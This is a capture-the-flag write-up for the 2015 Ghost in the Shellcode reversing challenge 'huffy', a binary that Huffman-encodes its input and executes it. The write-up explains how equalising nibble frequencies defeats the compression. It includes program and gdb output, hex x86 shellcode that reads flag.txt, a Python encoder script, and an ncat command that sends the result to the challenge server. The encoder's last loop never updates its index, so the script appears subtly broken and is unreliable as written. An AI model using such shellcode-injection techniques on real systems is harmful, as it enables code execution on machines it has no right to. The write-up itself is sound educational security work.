Ghost in the Shellcode 2015: Reversing 300 "huffy"

Gathering Information

Find the key!
File: File
Server: huffy.2015.ghostintheshellcode.com:8143

This was the only “official” reversing challenge in the 2015 edition of the Ghost in the Shellcode CTF. It was made available several hours before the end of the competition and worth 300 juicy points.

Executing the binary and entering some random text yields a lot of output:

$ ./huffy
CWD: ~/CTF/2015_01_GitS/rev300_huffy
AAAA
Nibble  Frequency
------  ---------
0   0.100000
1   0.400000
2   0.000000
3   0.000000
4   0.400000
5   0.000000
6   0.000000
7   0.000000
8   0.000000
9   0.000000
a   0.100000
b   0.000000
c   0.000000
d   0.000000
e   0.000000
f   0.000000

Read 5 bytes
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.100000
Two lowest frequencies: 0.100000 and 0.100000
Two lowest frequencies: 0.200000 and 0.200000
Two lowest frequencies: 0.400000 and 0.400000
Two lowest frequencies: 0.400000 and 0.800000
Breaking!
0 --0-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
1 --0-- 0x804c3c0 
2 --0-- 0x804c258 --0-- 0x804c270 --0-- 0x804c288 --0-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
3 --1-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
4 --1-- 0x804c3a8 --1-- 0x804c3c0 
5 --1-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
6 --1-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
7 --1-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
8 --1-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
9 --1-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
a --1-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
b --1-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
c --1-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
d --1-- 0x804c288 --0-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
e --1-- 0x804c270 --0-- 0x804c288 --0-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
f --1-- 0x804c258 --0-- 0x804c270 --0-- 0x804c288 --0-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 
Encoding input...
ASCII Encoded: 110110110110101010111
Binary Encoded:
�j
Executing encoded input...
[1]    10542 segmentation fault (core dumped)  ./huffy

Okay, let’s see what is going on here. It prints out the current working dir and asks for input. After being fed with data and pressing C-d to signal a EOF, the binary performs a frequency analysis on the nibbles of the input and prints out the result. Indeed, we find (including the “invisible” newline character)

echo "AAAA" | hd
00000000  41 41 41 41 0a                                    |AAAA.|
00000005

\[ P(X = ‘0’) = \frac{1}{10} = 0.1 \
P(X = ‘1’) = \frac{4}{10} = 0.4 \
P(X = ‘4’) = \frac{4}{10} = 0.4 \
P(X = ‘a’) = \frac{1}{10} = 0.1 \
\]

which is consistent with the relative frequencies displayed by the program. Afterwards we see that the two lowest frequencies are added iteratively to each other to construct a tree, which is eventually printed out. Sounds familiar? It should, together with the name of the challenge huffy it becomes obvious that this is a straightforward construction of a huffman tree. Thus, the tree not only gives us the heap addresses of the allocated tree nodes but also the bit sequences each input nibble will be substituted with. Note that the bit sequences are inverted as they are pointing from the leaf towards the root of the tree – looking at the binary representation (gracefully given to us on stderr) we can see the bit sequence our input AAAA\n is transformed to:

echo "AAAA" | ./huffy 2>&1 | hd | tail -n 6
00000e30  31 31 30 31 31 30 31 31  30 31 31 30 31 30 31 30  |1101101101101010|
00000e40  31 30 31 31 31 0a 42 69  6e 61 72 79 20 45 6e 63  |10111.Binary Enc|
00000e50  6f 64 65 64 3a 0a db 6a  17 0a 45 78 65 63 75 74  |oded:..j..Execut|
00000e60  69 6e 67 20 65 6e 63 6f  64 65 64 20 69 6e 70 75  |ing encoded inpu|
00000e70  74 2e 2e 2e 0a                                    |t....|
00000e75

Using the tree from above substituting each nibble by its associated bit sequence, we find:

'AAAA\n' = 0x41 0x41 0x41 0x41 0x0a
         = 0x4  0x1  0x4  0x1  0x4  0x1  0x4  0x1  0x0  0xa
         = 11   0    11   0    11   0    11   0    1010 10111
         = 11011011                 01101010            10111
         = 0xdb                     0x6a                0x17

After compressing the input the program prints Executing encoded input.... This probably is the reason why it segfauls afterwards (the byte sequence db 6a 17 does not form valid instructions). Verifying with gdb tells us that this assumption is correct.

$ gdb ./huffy
gdb-peda$ r >/dev/null
Starting program: ~/CTF/2015_01_GitS/rev300_huffy/huffy >/dev/null
AAAA
�j
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xf7fd5000 --> 0x176adb
EBX: 0xf7fac960 --> 0xfbad2887
ECX: 0xf7fad878 --> 0x0
EDX: 0x0
ESI: 0x0
EDI: 0x804c3ee --> 0x0
EBP: 0xffffd088 --> 0x0
ESP: 0xffffc80c --> 0x804902e (<main+502>:  mov    eax,ds:0x804b080)
EIP: 0xf7fd5000 --> 0x176adb
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0xf7fd5000:  fld    TBYTE PTR [edx+0x17]
   0xf7fd5003:  add    BYTE PTR [eax],al
   0xf7fd5005:  add    BYTE PTR [eax],al
   0xf7fd5007:  add    BYTE PTR [eax],al
[------------------------------------stack-------------------------------------]
0000| 0xffffc80c --> 0x804902e (<main+502>: mov    eax,ds:0x804b080)
0004| 0xffffc810 --> 0xf7facac0 --> 0xfbad2884
0008| 0xffffc814 --> 0x1
0012| 0xffffc818 --> 0x3
0016| 0xffffc81c --> 0xf7fac960 --> 0xfbad2887
0020| 0xffffc820 --> 0x0
0024| 0xffffc824 --> 0x0
0028| 0xffffc828 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xf7fd5000 in ?? ()
gdb-peda$ x/20xb $pc
0xf7fd5000: 0xdb    0x6a    0x17    0x00    0x00    0x00    0x00    0x00
0xf7fd5008: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xf7fd5010: 0x00    0x00    0x00    0x00

To summarize: We feed payload into the program which is encoded using a huffman compression which then is executed by the program. As we also have a remote address of the binary this means we get a free shell as long as we are able to find an input string which gets compressed to shellcode (kinda weird, isn’t it?).

Disabling the Compression

Let’s recap a little bit of basic information theory: Shannon’s coding theorem tells us that a lower bound for any compression algorithm is the entropy of the input source in bits per symbol. We want the hufman compression to have as least impact on our input as possible such that it doesn’t damage the shellcode we’re feeding into the binary. To make huffman coding performing as bad as possible we thus need to maximize the entropy of the source. In order to achieve this, basic math tells us that each input symbol needs to be equally likely. The input symbols are the nibbles of the original data given to the binary. Let’s see what happens if we throw such a string into the binary:

$ echo -n "\x01\x23\x45\x67\x89\xab\xcd\xef" | ./huffy
CWD: ~/CTF/2015_01_GitS/rev300_huffy
Nibble  Frequency
------  ---------
0   0.062500
1   0.062500
2   0.062500
3   0.062500
4   0.062500
5   0.062500
6   0.062500
7   0.062500
8   0.062500
9   0.062500
a   0.062500
b   0.062500
c   0.062500
d   0.062500
e   0.062500
f   0.062500

Read 8 bytes
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.125000 and 0.125000
Two lowest frequencies: 0.125000 and 0.125000
Two lowest frequencies: 0.125000 and 0.125000
Two lowest frequencies: 0.125000 and 0.125000
Two lowest frequencies: 0.250000 and 0.250000
Two lowest frequencies: 0.250000 and 0.250000
Two lowest frequencies: 0.500000 and 0.500000
Breaking!
0 --0--> 0x9043258 --0--> 0x9043318 --0--> 0x9043378 --0--> 0x90433a8
1 --0--> 0x9043270 --0--> 0x9043330 --0--> 0x9043390 --1--> 0x90433a8
2 --0--> 0x9043288 --0--> 0x9043348 --1--> 0x9043390 --1--> 0x90433a8
3 --0--> 0x90432a0 --0--> 0x9043360 --1--> 0x9043378 --0--> 0x90433a8
4 --0--> 0x90432b8 --1--> 0x9043360 --1--> 0x9043378 --0--> 0x90433a8
5 --0--> 0x90432d0 --1--> 0x9043348 --1--> 0x9043390 --1--> 0x90433a8
6 --0--> 0x90432e8 --1--> 0x9043330 --0--> 0x9043390 --1--> 0x90433a8
7 --0--> 0x9043300 --1--> 0x9043318 --0--> 0x9043378 --0--> 0x90433a8
8 --1--> 0x9043300 --1--> 0x9043318 --0--> 0x9043378 --0--> 0x90433a8
9 --1--> 0x90432e8 --1--> 0x9043330 --0--> 0x9043390 --1--> 0x90433a8
a --1--> 0x90432d0 --1--> 0x9043348 --1--> 0x9043390 --1--> 0x90433a8
b --1--> 0x90432b8 --1--> 0x9043360 --1--> 0x9043378 --0--> 0x90433a8
c --1--> 0x90432a0 --0--> 0x9043360 --1--> 0x9043378 --0--> 0x90433a8
d --1--> 0x9043288 --0--> 0x9043348 --1--> 0x9043390 --1--> 0x90433a8
e --1--> 0x9043270 --0--> 0x9043330 --0--> 0x9043390 --1--> 0x90433a8
f --1--> 0x9043258 --0--> 0x9043318 --0--> 0x9043378 --0--> 0x90433a8
Encoding input...
ASCII Encoded: 0000100011000100011011101010001000111011111101110101110110010001
Binary Encoded:
�n�;�]�
Executing encoded input...
[1]    10361 done                              echo -n "\x01\x23\x45\x67\x89\xab\xcd\xef" | 
       10362 segmentation fault (core dumped)  ./huffy

Awesome! The algorithm is unable to compress our input any further, effectively turning the huffman compression into a simple substitution. Inverting the bits (remember that the list above is starting at the leaves) we obtain the following substitution table:

0 -> 0
1 -> 8
2 -> c
3 -> 4
4 -> 6
5 -> e
6 -> a
7 -> 2
8 -> 3
9 -> b
a -> f
b -> 7
c -> 5
d -> d
e -> 9
f -> 1

This makes the rest pretty easy: Take the shellcode, append it such that all nibbles are equally likely in the whole input source and do the inverse substituation. We can write a small python script which does that for us:

#!/usr/bin/python

import sys
import binascii

# Simple x86 "cat flag.txt" shellcode
s = "eb37b0050fb6c05b31c9884b08cd8089c3b0030fb6c031d2b68029d489e1cd8089c2b0040fb6c0b3010fb6db89e1cd80b0010fb6c031dbcd80e8c4ffffff666c61672e74787441"

c = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
i = 0
m = 0

for i in range(len(s)):
    c[int(s[i], 16)] += 1

for i in range(len(c)):
    if c[i] > m:
        m = c[i]

for i in range(len(c)):
    h = "%x" % i
    s += h * (m - c[i])

for c in s:
    if i % 2 == 0: sys.stdout.write("\\x")
    if c == "0": sys.stdout.write("0")
    if c == "8": sys.stdout.write("1")
    if c == "4": sys.stdout.write("3")
    if c == "c": sys.stdout.write("2")
    if c == "2": sys.stdout.write("7")
    if c == "a": sys.stdout.write("6")
    if c == "6": sys.stdout.write("4")
    if c == "e": sys.stdout.write("5")
    if c == "9": sys.stdout.write("e")
    if c == "5": sys.stdout.write("c")
    if c == "d": sys.stdout.write("d")
    if c == "3": sys.stdout.write("8")
    if c == "b": sys.stdout.write("9")
    if c == "7": sys.stdout.write("b")
    if c == "f": sys.stdout.write("a")
    if c == "1": sys.stdout.write("f")

The rest is a matter of

$ ./pwn.py | ncat huffy.2015.ghostintheshellcode.com 8143

which gives us a flag worth 300 points.

As a summary: We’ve just solved a reversing binary without ever having to look at the disassembly itself. The debug prints make it really obvious how to solve the task. On the other hand, playing a WAV file on an oscilloscope (as demanded in a different challenge) was considered to be worth only 200 points – not very balanced.